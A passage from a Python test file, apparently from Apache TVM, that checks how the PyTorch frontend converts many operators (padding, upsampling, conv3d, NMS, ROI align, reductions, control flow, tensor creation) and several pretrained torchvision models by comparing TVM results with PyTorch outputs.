class Chunk1(Module):
def forward(self, *args):
chunks = args[0].chunk(7, 2)
return torch.cat(chunks, 2)
input_data = torch.rand(input_shape).float()
verify_model(Chunk1().float().eval(), input_data=input_data)
@tvm.testing.uses_gpu
def test_upsample():
class Upsample(Module):
def __init__(self, size=None, scale=None, mode="nearest", align_corners=None):
super().__init__()
self.size = size
self.scale = scale
self.mode = mode
self.align_corners = align_corners
def forward(self, x):
return torch.nn.functional.interpolate(
x,
size=self.size,
scale_factor=self.scale,
mode=self.mode,
align_corners=self.align_corners,
)
inp = torch.rand((1, 3, 32, 32))
verify_model(Upsample(size=(64, 64), mode="nearest"), inp)
verify_model(Upsample(scale=2, mode="nearest"), inp)
verify_model(Upsample(size=(50, 50), mode="nearest"), inp)
verify_model(Upsample(size=(64, 64), mode="bilinear", align_corners=True), inp)
verify_model(Upsample(scale=2, mode="bilinear", align_corners=True), inp)
verify_model(Upsample(size=(50, 50), mode="bilinear", align_corners=True), inp)
@tvm.testing.uses_gpu
def test_to():
""" test for aten::to(...) """
class ToCPU(Module):
def forward(self, x):
return x.to("cpu")
class ToFloat(Module):
def forward(self, x):
return x.float()
class ToInt(Module):
def forward(self, x):
return x.int()
class ToLong(Module):
def forward(self, x):
return x.long()
class ToDouble(Module):
def forward(self, x):
return x.double()
class ToFloat16(Module):
def forward(self, x):
return x.to(torch.float16)
verify_model(ToCPU().eval(), torch.rand((1, 3, 32, 32)))
verify_model(ToFloat().eval(), torch.zeros((1, 3, 32, 32), dtype=torch.int))
verify_model(ToFloat().eval(), torch.tensor(2, dtype=torch.int))
verify_model(ToInt().eval(), torch.zeros((1, 3, 32, 32)))
verify_model(ToInt().eval(), torch.tensor(0.8))
verify_model(ToLong().eval(), torch.tensor(0.8))
verify_model(ToDouble().eval(), torch.tensor(0.8))
verify_model(ToFloat16().eval(), torch.tensor(2, dtype=torch.float32))
verify_model(ToFloat16().eval(), torch.zeros((1, 3, 32, 32), dtype=torch.int))
@tvm.testing.uses_gpu
def test_adaptive_pool3d():
for ishape in [(1, 32, 16, 16, 16), (1, 32, 9, 15, 15), (1, 32, 13, 7, 7)]:
inp = torch.rand(ishape)
verify_model(torch.nn.AdaptiveMaxPool3d((1, 1, 1)).eval(), inp)
verify_model(torch.nn.AdaptiveMaxPool3d((2, 2, 2)).eval(), inp)
verify_model(torch.nn.AdaptiveAvgPool3d((1, 1, 1)).eval(), inp)
verify_model(torch.nn.AdaptiveAvgPool3d((2, 2, 2)).eval(), inp)
verify_model(torch.nn.AdaptiveAvgPool3d((4, 8, 8)).eval(), inp)
verify_model(torch.nn.AdaptiveMaxPool3d((7, 8, 9)).eval(), inp)
@tvm.testing.uses_gpu
def test_forward_functional_pad():
torch.set_grad_enabled(False)
pad = (0, 0)
class Pad1(Module):
def forward(self, *args):
return torch.nn.functional.pad(args[0], pad, "constant", 0)
input_data = torch.rand((3, 3, 4, 2))
pad = (1, 1)
verify_model(Pad1().float().eval(), input_data=input_data)
pad = (1, 1, 2, 2)
verify_model(Pad1().float().eval(), input_data=input_data)
pad = (0, 1, 2, 1, 3, 3)
verify_model(Pad1().float().eval(), input_data=input_data)
@tvm.testing.uses_gpu
def test_forward_zero_pad2d():
inp = torch.rand((1, 1, 3, 3))
verify_model(torch.nn.ZeroPad2d(2).eval(), inp)
verify_model(torch.nn.ZeroPad2d((1, 1, 2, 0)).eval(), inp)
@tvm.testing.uses_gpu
def test_forward_constant_pad1d():
inp = torch.rand((1, 2, 4))
verify_model(torch.nn.ConstantPad2d(2, 3.5).eval(), inp)
inp = torch.rand((1, 2, 3))
verify_model(torch.nn.ConstantPad2d((3, 1), 3.5).eval(), inp)
@tvm.testing.uses_gpu
def test_forward_constant_pad2d():
inp = torch.rand((1, 2, 2, 2))
verify_model(torch.nn.ConstantPad2d(2, 3.5).eval(), inp)
verify_model(torch.nn.ConstantPad2d((3, 0, 2, 1), 3.5).eval(), inp)
@tvm.testing.uses_gpu
def test_forward_constant_pad3d():
inp = torch.rand((1, 3, 2, 2, 2))
verify_model(torch.nn.ConstantPad3d(3, 3.5).eval(), inp)
verify_model(torch.nn.ConstantPad3d((3, 4, 5, 6, 0, 1), 3.5).eval(), inp)
@tvm.testing.uses_gpu
def test_forward_reflection_pad1d():
inp = torch.rand((1, 2, 4))
verify_model(torch.nn.ReflectionPad1d(2).eval(), inp)
verify_model(torch.nn.ReflectionPad1d((3, 1)).eval(), inp)
inp = torch.rand((2, 4, 5))
verify_model(torch.nn.ReflectionPad1d((2, 3)).eval(), inp)
@tvm.testing.uses_gpu
def test_forward_reflection_pad2d():
inp = torch.rand((1, 1, 3, 3))
verify_model(torch.nn.ReflectionPad2d(2).eval(), inp)
verify_model(torch.nn.ReflectionPad2d((1, 1, 2, 0)).eval(), inp)
inp = torch.rand((2, 4, 5, 6))
verify_model(torch.nn.ReflectionPad2d((1, 3, 2, 4)).eval(), inp)
@tvm.testing.uses_gpu
def test_forward_replication_pad1d():
inp = torch.rand((1, 2, 4))
verify_model(torch.nn.ReplicationPad1d(2).eval(), inp)
verify_model(torch.nn.ReplicationPad1d((3, 1)).eval(), inp)
inp = torch.rand((2, 4, 5))
verify_model(torch.nn.ReplicationPad1d((2, 3)).eval(), inp)
@tvm.testing.uses_gpu
def test_forward_replication_pad2d():
inp = torch.rand((1, 1, 3, 3))
verify_model(torch.nn.ReplicationPad2d(2).eval(), inp)
verify_model(torch.nn.ReplicationPad2d((1, 1, 2, 0)).eval(), inp)
inp = torch.rand((2, 4, 5, 6))
verify_model(torch.nn.ReplicationPad2d((1, 3, 2, 4)).eval(), inp)
@tvm.testing.uses_gpu
def test_forward_replication_pad3d():
inp = torch.rand((1, 1, 3, 3, 3))
verify_model(torch.nn.ReplicationPad3d(3).eval(), inp)
verify_model(torch.nn.ReplicationPad3d((1, 1, 2, 2, 1, 1)).eval(), inp)
inp = torch.rand((7, 5, 4, 5, 6))
verify_model(torch.nn.ReplicationPad3d((2, 3, 2, 5, 1, 4)).eval(), inp)
@tvm.testing.uses_gpu
def test_forward_upsample3d():
inp = torch.arange(1, 9, dtype=torch.float32).view(1, 1, 2, 2, 2)
verify_model(torch.nn.Upsample(scale_factor=2, mode="nearest").eval(), inp)
verify_model(torch.nn.Upsample(scale_factor=2, mode="trilinear").eval(), inp)
verify_model(
torch.nn.Upsample(scale_factor=2, mode="trilinear", align_corners=True).eval(), inp
)
def test_forward_nms():
"""dynamic Non-Maximum Suppression"""
torch.set_grad_enabled(False)
class NonMaxSupression(Module):
def __init__(self, iou_thres):
super().__init__()
self.iou_threshold = iou_thres
def forward(self, *args):
return torchvision.ops.nms(args[0], args[1], self.iou_threshold)
# Generate random input data
def _gen_rand_inputs(num_boxes):
box_len = 4
boxes = torch.rand(num_boxes, box_len, dtype=torch.float) * 0.5
boxes[:, 2] += boxes[:, 0]
boxes[:, 3] += boxes[:, 1]
scores = torch.rand(num_boxes, dtype=torch.float)
return boxes, scores
targets = ["llvm"] # dynamic nms does not work on gpu
for num_boxes, iou_thres in [(10, 0.3), (100, 0.5), (500, 0.9)]:
in_boxes, in_scores = _gen_rand_inputs(num_boxes)
verify_trace_model(NonMaxSupression(iou_thres), [in_boxes, in_scores], targets)
def test_forward_roi_align():
"""ROI align"""
torch.set_grad_enabled(False)
class ROIAlgin(Module):
def __init__(self, output_sizes, spatial_scale=1.0, sampling_ratio=-1):
super().__init__()
self.spatial_scale = spatial_scale
self.sampling_ratio = sampling_ratio
self.output_sizes = output_sizes
def forward(self, *args):
return torchvision.ops.roi_align(
args[0],
args[1],
self.output_sizes,
self.spatial_scale,
self.sampling_ratio,
)
in_data = torch.Tensor(np.random.uniform(size=(1, 8, 100, 100)))
in_boxes = torch.Tensor(np.random.uniform(0.0, 100.0, size=(35, 4)))
in_batch = torch.zeros((35, 1), dtype=torch.float)
in_boxes = torch.cat([in_batch, in_boxes], dim=1)
verify_model(ROIAlgin(7), [in_data, in_boxes])
verify_model(ROIAlgin((10, 10), 0.7, 5), [in_data, in_boxes])
verify_model(ROIAlgin(15, 0.9, 3), [in_data, in_boxes])
@tvm.testing.uses_gpu
def test_conv3d():
for ishape in [(1, 32, 16, 16, 16), (1, 32, 9, 15, 15), (1, 32, 13, 7, 7)]:
inp = torch.rand(ishape)
verify_model(torch.nn.Conv3d(32, 16, (3, 3, 3), padding=(1, 1, 1)).eval(), inp),
verify_model(torch.nn.Conv3d(32, 16, (5, 5, 5), padding=(2, 2, 2)).eval(), inp),
verify_model(torch.nn.Conv3d(32, 16, kernel_size=1).eval(), inp)
# downsample
verify_model(torch.nn.Conv3d(32, 16, kernel_size=1, stride=2).eval(), inp)
@tvm.testing.uses_gpu
def test_conv3d_transpose():
for ishape in [(1, 8, 10, 5, 10), (1, 8, 5, 8, 8), (1, 8, 13, 7, 7)]:
inp = torch.rand(ishape)
verify_model(
torch.nn.ConvTranspose3d(
in_channels=8, out_channels=33, kernel_size=3, stride=2
).eval(),
inp,
),
verify_model(
torch.nn.ConvTranspose3d(
in_channels=8,
out_channels=20,
kernel_size=(3, 5, 2),
stride=(2, 1, 1),
padding=(0, 4, 2),
).eval(),
inp,
),
verify_model(
torch.nn.ConvTranspose3d(in_channels=8, out_channels=20, kernel_size=1).eval(), inp
)
verify_model(
torch.nn.ConvTranspose3d(in_channels=8, out_channels=5, kernel_size=1, stride=2).eval(),
inp,
)
# Model tests
@tvm.testing.uses_gpu
def test_resnet18():
torch.set_grad_enabled(False)
verify_model("resnet18", atol=1e-4, rtol=1e-4)
@tvm.testing.uses_gpu
def test_squeezenet1_0():
torch.set_grad_enabled(False)
verify_model("squeezenet1_0", atol=1e-4, rtol=1e-4)
@tvm.testing.uses_gpu
def test_squeezenet1_1():
torch.set_grad_enabled(False)
verify_model("squeezenet1_1", atol=1e-4, rtol=1e-4)
@tvm.testing.uses_gpu
def test_densenet121():
torch.set_grad_enabled(False)
verify_model("densenet121", atol=1e-4, rtol=1e-4)
@tvm.testing.uses_gpu
def test_inception_v3():
torch.set_grad_enabled(False)
verify_model("inception_v3", atol=1e-4, rtol=1e-4)
@tvm.testing.uses_gpu
def test_googlenet():
torch.set_grad_enabled(False)
verify_model("googlenet", atol=1e-4, rtol=1e-4)
@tvm.testing.uses_gpu
def test_mnasnet0_5():
torch.set_grad_enabled(False)
verify_model("mnasnet0_5", atol=1e-4, rtol=1e-4)
@tvm.testing.uses_gpu
def test_mobilenet_v2():
torch.set_grad_enabled(False)
verify_model("mobilenet_v2", atol=1e-4, rtol=1e-4)
"""
#TODO: Fix VGG and AlexNet issues (probably due to pooling)
@tvm.testing.uses_gpu
def test_alexnet():
torch.set_grad_enabled(False)
verify_model("alexnet")
@tvm.testing.uses_gpu
def test_vgg11():
torch.set_grad_enabled(False)
verify_model("vgg11")
@tvm.testing.uses_gpu
def test_vgg11_bn():
torch.set_grad_enabled(False)
verify_model("vgg11_bn")
"""
@tvm.testing.uses_gpu
def test_custom_conversion_map():
def get_roi_align():
pool_size = 5
n_channels = 2 * (pool_size ** 2)
x = torch.rand(2, n_channels, 10, 10)
rois = torch.tensor(
[
[0, 0, 0, 9, 9], # format is (xyxy)
[0, 0, 5, 4, 9],
[0, 5, 5, 9, 9],
[1, 0, 0, 9, 9],
],
dtype=torch.float,
)
roi_align = torchvision.ops.RoIAlign(pool_size, spatial_scale=1, sampling_ratio=-1)
return roi_align.eval(), [x, rois]
def convert_roi_align():
def _impl(inputs, input_types):
spatial_scale = inputs[2]
pooled_size = (inputs[3], inputs[4])
sampling_ratio = inputs[5]
return relay.op.vision.roi_align(
inputs[0], inputs[1], pooled_size, spatial_scale, sampling_ratio
)
return _impl
custom_map = {"torchvision::roi_align": convert_roi_align()}
model, inputs = get_roi_align()
verify_model(model, inputs, custom_map)
@tvm.testing.uses_gpu
def test_segmentaton_models():
class SegmentationModelWrapper(Module):
def __init__(self, model):
super().__init__()
self.model = model
def forward(self, inp):
out = self.model(inp)
return out["out"]
fcn = torchvision.models.segmentation.fcn_resnet101(pretrained=True)
deeplab = torchvision.models.segmentation.deeplabv3_resnet101(pretrained=True)
inp = [torch.rand((1, 3, 300, 300), dtype=torch.float)]
verify_model(SegmentationModelWrapper(fcn.eval()), inp, atol=1e-4, rtol=1e-4)
verify_model(SegmentationModelWrapper(deeplab.eval()), inp, atol=1e-4, rtol=1e-4)
@tvm.testing.uses_gpu
def test_3d_models():
input_shape = (1, 3, 4, 56, 56)
resnet3d = torchvision.models.video.r3d_18(pretrained=True).eval()
verify_model(resnet3d, [torch.rand(input_shape)], atol=1e-4, rtol=1e-4)
def _get_default_vm_targets():
return [tgt for (tgt, _) in tvm.testing.enabled_targets()]
def verify_script_model(pt_model, ishapes, targets):
script_module = torch.jit.script(pt_model)
verify_model_vm(script_module, ishapes, targets=targets)
def verify_trace_model(pt_model, idata, targets):
traced_model = torch.jit.trace(pt_model, idata)
ishapes = [data.shape for data in idata]
verify_model_vm(traced_model, ishapes, idata=idata, targets=targets)
def verify_model_vm(input_model, ishapes, idtype=torch.float, idata=None, targets=["llvm"]):
input_names = ["i{}".format(idx) for idx, ish in enumerate(ishapes)]
input_shapes = list(zip(input_names, ishapes))
input_data = idata if idata else [torch.randn(shape, dtype=idtype) for shape in ishapes]
# Compile via VM
mod, params = relay.frontend.from_pytorch(input_model, input_shapes)
for tgt in targets:
print("Running on target", tgt)
ctx = tvm.context(tgt, 0)
executor = relay.create_executor("vm", mod=mod, ctx=ctx, target=tgt)
evaluator = executor.evaluate()
# Inference
for name, inp in zip(input_names, input_data):
params[name] = inp.numpy()
vm_res = evaluator(**params)
# Baseline result
with torch.no_grad():
pt_result = input_model(*input_data)
# Verify the accuracy
if not isinstance(pt_result, torch.Tensor):
tvm_res = vm_res.asnumpy().item()
assert pt_result == tvm_res
else:
tvm.testing.assert_allclose(vm_res.asnumpy(), pt_result.numpy(), rtol=1e-5, atol=1e-5)
@tvm.testing.uses_gpu
def test_control_flow():
class SimpleIf(torch.nn.Module):
def __init__(self, N, M):
super().__init__()
self.weight = torch.nn.Parameter(torch.rand(N, M))
def forward(self, inp):
if inp.sum() > 0.0:
output = self.weight + inp
else:
output = self.weight - inp
return output
class NestedIf(torch.nn.Module):
def __init__(self, N, M):
super().__init__()
self.weight = torch.nn.Parameter(torch.rand(N, M))
def forward(self, inp):
if inp.sum() > 0.0:
if inp.mean() > 0.0:
output = self.weight + inp
else:
output = self.weight - inp
else:
if inp.mean() >= 0.0:
output = self.weight * inp
else:
output = self.weight / inp
return output
class ScalarLoop(torch.nn.Module):
def forward(self, inp):
a = 0
for i in range(inp.size(0)):
b = i * i
b = b + 1
a += b
if a != 0:
a += 1
else:
a += 2
return a
class SimpleLoop(torch.nn.Module):
def forward(self, inp):
a = inp
for i in range(inp.size(0)):
b = a * 2.0
c = a + b
a += c
return a
class LoopWithIf(torch.nn.Module):
def forward(self, inp):
a = inp
for i in range(inp.size(0)):
b = a * 2.0
b = a + b
if b.sum() > 0.0:
a += b
else:
a -= b
return a
class NestedLoop(torch.nn.Module):
def forward(self, inp):
a = inp
for i in range(inp.size(0)):
b = a * float(i)
for j in range(inp.size(1)):
a += b * float(j)
return a
class SimpleScalarWhileLoop(torch.nn.Module):
def forward(self, inp):
a = 1
i = 0
while i <= inp.size(0):
a += i
i += 2
i = 0
# also test constant init cond
while i < 10:
a += i
i += 3
return a
class SimpleWhileLoop(torch.nn.Module):
def forward(self, inp):
a = inp
i = 0
while i < inp.size(0):
a += a * float(i) * 2.0
i += 1
return a
models = [
SimpleIf(10, 20),
NestedIf(10, 20),
ScalarLoop(),
SimpleLoop(),
LoopWithIf(),
SimpleScalarWhileLoop(),
SimpleWhileLoop(),
NestedLoop(),
]
for pt_model in models:
verify_script_model(pt_model.eval(), [(10, 20)], _get_default_vm_targets())
@tvm.testing.uses_gpu
def test_simple_rnn():
# The mixed tracing and scripting example from
# https://pytorch.org/tutorials/beginner/Intro_to_TorchScript_tutorial.html#mixing-scripting-and-tracing
class DecisionGate(torch.nn.Module):
def forward(self, x):
if x.sum() > 0:
return x
else:
return -x
class Cell(torch.nn.Module):
def __init__(self, dg):
super(Cell, self).__init__()
self.dg = dg
self.linear = torch.nn.Linear(4, 4)
def forward(self, x, h):
new_h = torch.tanh(self.dg(self.linear(x)) + h)
return new_h, new_h
class RNNLoop(torch.nn.Module):
def __init__(self):
super().__init__()
x = torch.rand(10, 4, dtype=torch.float)
h = torch.rand(10, 4, dtype=torch.float)
self.cell = torch.jit.trace(Cell(DecisionGate()), (x, h))
def forward(self, xs):
h = torch.zeros(10, 4, dtype=torch.float)
y = torch.zeros(10, 4, dtype=torch.float)
for i in range(xs.size(0)):
y, h = self.cell(xs[i], h)
return y
verify_script_model(RNNLoop().eval(), [(10, 10, 4)], _get_default_vm_targets())
@tvm.testing.uses_gpu
def test_forward_reduce_sum():
torch.set_grad_enabled(False)
input_shape = [1, 3, 10, 10]
class ReduceSum1(Module):
def forward(self, *args):
return args[0].sum(1)
class ReduceSum2(Module):
def forward(self, *args):
return args[0].sum(dim=1, keepdim=False)
class ReduceSum3(Module):
def forward(self, *args):
return args[0].sum(dim=2, keepdim=True)
class ReduceSum4(Module):
def forward(self, *args):
return args[0].sum(dim=(2, 3), keepdim=True)
class ReduceSum5(Module):
def forward(self, *args):
return args[0].sum(dim=(2, 3), keepdim=False)
input_data = torch.rand(input_shape).float()
verify_model(ReduceSum1().float().eval(), input_data=input_data)
verify_model(ReduceSum2().float().eval(), input_data=input_data)
verify_model(ReduceSum3().float().eval(), input_data=input_data)
verify_model(ReduceSum4().float().eval(), input_data=input_data)
verify_model(ReduceSum5().float().eval(), input_data=input_data)
@tvm.testing.uses_gpu
def test_forward_reduce_prod():
torch.set_grad_enabled(False)
input_shape = [1, 3, 10, 10]
class ReduceProd1(Module):
def forward(self, *args):
return args[0].prod(1)
class ReduceProd2(Module):
def forward(self, *args):
return args[0].prod(dim=1, keepdim=False)
class ReduceProd3(Module):
def forward(self, *args):
return args[0].prod(dim=2, keepdim=True)
input_data = torch.rand(input_shape).float()
verify_model(ReduceProd1().float().eval(), input_data=input_data)
verify_model(ReduceProd2().float().eval(), input_data=input_data)
verify_model(ReduceProd3().float().eval(), input_data=input_data)
@tvm.testing.uses_gpu
def test_forward_argmin():
torch.set_grad_enabled(False)
input_shape = [1, 3, 10, 10]
class ArgMin1(Module):
def forward(self, *args):
return args[0].argmin(1)
class ArgMin2(Module):
def forward(self, *args):
return args[0].argmin(dim=1, keepdim=False)
class ArgMin3(Module):
def forward(self, *args):
return args[0].argmin(dim=2, keepdim=True)
input_data = torch.rand(input_shape).float()
verify_model(ArgMin1().float().eval(), input_data=input_data)
verify_model(ArgMin2().float().eval(), input_data=input_data)
verify_model(ArgMin3().float().eval(), input_data=input_data)
@tvm.testing.uses_gpu
def test_forward_argmax():
torch.set_grad_enabled(False)
input_shape = [1, 3, 10, 10]
class ArgMax1(Module):
def forward(self, *args):
return args[0].argmax(1)
class ArgMax2(Module):
def forward(self, *args):
return args[0].argmax(dim=1, keepdim=False)
class ArgMax3(Module):
def forward(self, *args):
return args[0].argmax(dim=2, keepdim=True)
input_data = torch.rand(input_shape).float()
verify_model(ArgMax1().float().eval(), input_data=input_data)
verify_model(ArgMax2().float().eval(), input_data=input_data)
verify_model(ArgMax3().float().eval(), input_data=input_data)
@tvm.testing.uses_gpu
def test_forward_std():
torch.set_grad_enabled(False)
input_shape = [1, 3, 10, 10]
class Std1(Module):
def forward(self, *args):
return args[0].std(1, unbiased=False)
class Std2(Module):
def forward(self, *args):
return args[0].std(dim=1, keepdim=False, unbiased=False)
class Std3(Module):
def forward(self, *args):
return args[0].std(dim=2, keepdim=True, unbiased=False)
class Std4(Module):
def forward(self, *args):
return args[0].std(dim=(2, 3), keepdim=True, unbiased=False)
class Std5(Module):
def forward(self, *args):
return args[0].std(dim=(2, 3), keepdim=False, unbiased=False)
class Std6(Module):
def forward(self, *args):
return args[0].std(unbiased=False)
class Std7(Module):
def forward(self, *args):
return args[0].std(dim=1, keepdim=False, unbiased=True)
class Std8(Module):
def forward(self, *args):
return args[0].std(dim=(2, 3), keepdim=True, unbiased=True)
class Std9(Module):
def forward(self, *args):
return args[0].std(unbiased=True)
input_data = torch.rand(input_shape).float()
verify_model(Std1().float().eval(), input_data=input_data)
verify_model(Std2().float().eval(), input_data=input_data)
verify_model(Std3().float().eval(), input_data=input_data)
verify_model(Std4().float().eval(), input_data=input_data)
verify_model(Std5().float().eval(), input_data=input_data)
verify_model(Std6().float().eval(), input_data=input_data)
verify_model(Std7().float().eval(), input_data=input_data)
verify_model(Std8().float().eval(), input_data=input_data)
verify_model(Std9().float().eval(), input_data=input_data)
@tvm.testing.uses_gpu
def test_forward_variance():
torch.set_grad_enabled(False)
input_shape = [1, 3, 10, 10]
class Variance1(Module):
def forward(self, *args):
return args[0].var(1, unbiased=False)
class Variance2(Module):
def forward(self, *args):
return args[0].var(dim=1, keepdim=False, unbiased=False)
class Variance3(Module):
def forward(self, *args):
return args[0].var(dim=2, keepdim=True, unbiased=False)
class Variance4(Module):
def forward(self, *args):
return args[0].var(dim=(2, 3), keepdim=True, unbiased=False)
class Variance5(Module):
def forward(self, *args):
return args[0].var(dim=(2, 3), keepdim=False, unbiased=False)
class Variance6(Module):
def forward(self, *args):
return args[0].var(unbiased=False)
class Variance7(Module):
def forward(self, *args):
return args[0].var(dim=1, keepdim=False, unbiased=True)
class Variance8(Module):
def forward(self, *args):
return args[0].var(dim=(2, 3), keepdim=True, unbiased=True)
class Variance9(Module):
def forward(self, *args):
return args[0].var(unbiased=True)
input_data = torch.rand(input_shape).float()
verify_model(Variance1().float().eval(), input_data=input_data)
verify_model(Variance2().float().eval(), input_data=input_data)
verify_model(Variance3().float().eval(), input_data=input_data)
verify_model(Variance4().float().eval(), input_data=input_data)
verify_model(Variance5().float().eval(), input_data=input_data)
verify_model(Variance6().float().eval(), input_data=input_data)
verify_model(Variance7().float().eval(), input_data=input_data)
verify_model(Variance8().float().eval(), input_data=input_data)
verify_model(Variance9().float().eval(), input_data=input_data)
@tvm.testing.uses_gpu
def test_forward_rsub():
torch.set_grad_enabled(False)
class Rsub1(Module):
def forward(self, *args):
return torch.rsub(args[0], args[1])
class Rsub2(Module):
def forward(self, *args):
return torch.rsub(args[0], args[1], alpha=0.5)
d1 = torch.rand([1, 3]).float()
d2 = torch.rand([1, 3]).float()
d3 = torch.rand([1, 3]).int()
verify_model(Rsub1().float().eval(), input_data=[d1, d2])
verify_model(Rsub1().float().eval(), input_data=[d1, d3])
verify_model(Rsub2().float().eval(), input_data=[d1, d2])
verify_model(Rsub2().float().eval(), input_data=[d1, d3])
@tvm.testing.uses_gpu
def test_forward_embedding():
torch.set_grad_enabled(False)
input_data = torch.randint(0, 10, [2, 4]).long()
verify_model(torch.nn.Embedding(10, 3).float().eval(), input_data=input_data)
input_data = torch.randint(0, 4, [2, 3, 4]).long()
verify_model(torch.nn.Embedding(4, 5, sparse=False).float().eval(), input_data=input_data)
input_data = torch.randint(0, 4, [2, 3, 4]).long()
verify_model(torch.nn.Embedding(4, 5, sparse=True).float().eval(), input_data=input_data)
@tvm.testing.uses_gpu
def test_forward_onehot():
torch.set_grad_enabled(False)
class OneHot1(Module):
def forward(self, *args):
return torch.nn.functional.one_hot(args[0], num_classes=3)
class OneHot2(Module):
def forward(self, *args):
return torch.nn.functional.one_hot(args[0], num_classes=5)
input_data = torch.arange(0, 5) % 3
verify_model(OneHot1().float().eval(), input_data=input_data)
input_data = torch.arange(0, 5) % 4
verify_model(OneHot2().float().eval(), input_data=input_data)
@tvm.testing.uses_gpu
def test_forward_isfinite():
torch.set_grad_enabled(False)
class IsFinite1(Module):
def forward(self, *args):
return torch.isfinite(args[0])
input_data = torch.tensor([1, float("inf"), 2, float("-inf"), float("nan")]).float()
verify_model(IsFinite1().float().eval(), input_data=input_data)
@tvm.testing.uses_gpu
def test_forward_isnan():
torch.set_grad_enabled(False)
class IsNan1(Module):
def forward(self, *args):
return torch.isnan(args[0])
input_data = torch.tensor([1, float("inf"), 2, float("-inf"), float("nan")]).float()
verify_model(IsNan1().float().eval(), input_data=input_data)
@tvm.testing.uses_gpu
def test_forward_isinf():
torch.set_grad_enabled(False)
class IsInf1(Module):
def forward(self, *args):
return torch.isinf(args[0])
input_data = torch.tensor([1, float("inf"), 2, float("-inf"), float("nan")]).float()
verify_model(IsInf1().float().eval(), input_data=input_data)
@tvm.testing.uses_gpu
def test_forward_clamp():
torch.set_grad_enabled(False)
input_shape = [1, 3, 10, 10]
class Clamp1(Module):
def forward(self, *args):
return torch.clamp(args[0], min=-0.5, max=0.5)
class Clamp2(Module):
def forward(self, *args):
return torch.clamp(args[0], min=-0.3)
class Clamp3(Module):
def forward(self, *args):
return torch.clamp(args[0], max=1.0)
input_data = torch.rand(input_shape).float()
verify_model(Clamp1().float().eval(), input_data=input_data)
verify_model(Clamp2().float().eval(), input_data=input_data)
verify_model(Clamp3().float().eval(), input_data=input_data)
@tvm.testing.uses_gpu
def test_forward_clamp_():
torch.set_grad_enabled(False)
class ClampInPlace(Module):
def __init__(self, min, max):
super(ClampInPlace, self).__init__()
self.min = min
self.max = max
def forward(self, *args):
return torch.clamp_(args[0], self.min, self.max)
for ishape, min, max in (([4, 8], 0.1, 0.9), ([7, 6], 0.2, 0.5)):
input_data = torch.rand(ishape).float()
verify_model(ClampInPlace(min, max).float().eval(), input_data=input_data)
@tvm.testing.uses_gpu
def test_forward_ones():
torch.set_grad_enabled(False)
class Ones1(Module):
def forward(self, *args):
return torch.ones(2, 3)
verify_model(Ones1().float().eval(), input_data=[])
@tvm.testing.uses_gpu
def test_forward_ones_like():
torch.set_grad_enabled(False)
input_shape = [1, 3, 10, 10]
class OnesLike1(Module):
def forward(self, *args):
return torch.ones_like(args[0])
class OnesLike2(Module):
def forward(self, *args):
return torch.ones_like(args[0], dtype=torch.int8)
class OnesLike3(Module):
def forward(self, *args):
return torch.ones_like(args[0], dtype=torch.float)
input_data = torch.rand(input_shape).float()
verify_model(OnesLike1().float().eval(), input_data=input_data)
verify_model(OnesLike2().float().eval(), input_data=input_data)
verify_model(OnesLike3().float().eval(), input_data=input_data)
@tvm.testing.uses_gpu
def test_forward_zeros():
torch.set_grad_enabled(False)
class Zeros1(Module):
def forward(self, *args):
return torch.zeros(2, 3)
verify_model(Zeros1().float().eval(), input_data=[])
@tvm.testing.uses_gpu
def test_forward_zeros_like():
torch.set_grad_enabled(False)
input_shape = [1, 3, 10, 10]
class ZerosLike1(Module):
def forward(self, *args):
return torch.zeros_like(args[0])
class ZerosLike2(Module):
def forward(self, *args):
return torch.zeros_like(args[0], dtype=torch.int32)
class ZerosLike3(Module):
def forward(self, *args):
return torch.zeros_like(args[0], dtype=torch.float)
input_data = torch.rand(input_shape).float()
verify_model(ZerosLike1().float().eval(), input_data=input_data)
verify_model(ZerosLike2().float().eval(), input_data=input_data)
verify_model(ZerosLike3().float().eval(), input_data=input_data)
@tvm.testing.uses_gpu
def test_forward_full():
torch.set_grad_enabled(False)
class Full1(Module):
def forward(self, *args):
return torch.full((2, 3), 3.14)
class Full2(Module):
def forward(self, *args):
return torch.full((1, 2, 3), 1.0, dtype=torch.int32)
verify_model(Full1().float().eval(), input_data=[])
verify_model(Full2().float().eval(), input_data=[])
@tvm.testing.uses_gpu
def test_forward_full_like():
torch.set_grad_enabled(False)
input_shape = [1, 3, 10, 10]
class FullLike1(Module):
def forward(self, *args):
return torch.full_like(args[0], 3.14)
class FullLike2(Module):
def forward(self, *args):
return torch.full_like(args[0], 22.22, dtype=torch.int32)
class FullLike3(Module):
def forward(self, *args):
return torch.full_like(args[0], 1.4, dtype=torch.float)
input_data = torch.rand(input_shape).float()
verify_model(FullLike1().float().eval(), input_data=input_data)
verify_model(FullLike2().float().eval(), input_data=input_data)
verify_model(FullLike3().float().eval(), input_data=input_data)
@tvm.testing.uses_gpu
def test_forward_linspace():
torch.set_grad_enabled(False)
class Linspace1(Module):
def forward(self, *args):
return torch.linspace(5, 10)
class Linspace2(Module):
def forward(self, *args):
return torch.linspace(-10, 10, steps=5)
class Linspace3(Module):
def forward(self, *args):
return torch.linspace(start=-10, end=10, steps=5)
class Linspace4(Module):
def forward(self, *args):
return torch.linspace(start=-10, end=10, steps=1)
class Linspace5(Module):
def forward(self, *args):
return torch.linspace(1, 2, 1, dtype=torch.int32)
class Linspace6(Module):
def forward(self, *args):
return torch.linspace(start=1, end=6, steps=2)
class Linspace7(Module):
def forward(self, *args):
return torch.linspace(1, 4, dtype=torch.float32)
class Linspace8(Module):
def forward(self, *args):
return torch.linspace(1, 2, 1, dtype=torch.int16)
verify_model(Linspace1().float().eval())
verify_model(Linspace2().float().eval())
verify_model(Linspace3().float().eval())
verify_model(Linspace4().float().eval())
verify_model(Linspace5().float().eval())
verify_model(Linspace6().float().eval())
verify_model(Linspace7().float().eval())
verify_model(Linspace8().float().eval())
@tvm.testing.uses_gpu
def test_forward_take():
torch.set_grad_enabled(False)
class Take1(Module):
def forward(self, *args):
indices = torch.tensor([[0, 0], [1, 0]])
if torch.cuda.is_available():
indices = indices.cuda()
return torch.take(args[0], indices)
class Take2(Module):
def forward(self, *args):
return torch.take(args[0], args[1])
input_data = torch.tensor([[1, 2], [3, 4]])
verify_model(Take1().float().eval(), input_data=input_data)
indices = torch.tensor([[0, 0], [1, 0]])
verify_model(Take2().float().eval(), input_data=[input_data, indices])
@tvm.testing.uses_gpu
def test_forward_topk():
torch.set_grad_enabled(False)
class Topk1(Module):
def forward(self, *args):
return torch.topk(args[0], k=3)
class Topk2(Module):
def forward(self, *args):
return torch.topk(args[0], k=3, dim=-2)
class Topk3(Module):
def forward(self, *args):
return torch.topk(args[0], k=3, dim=3)
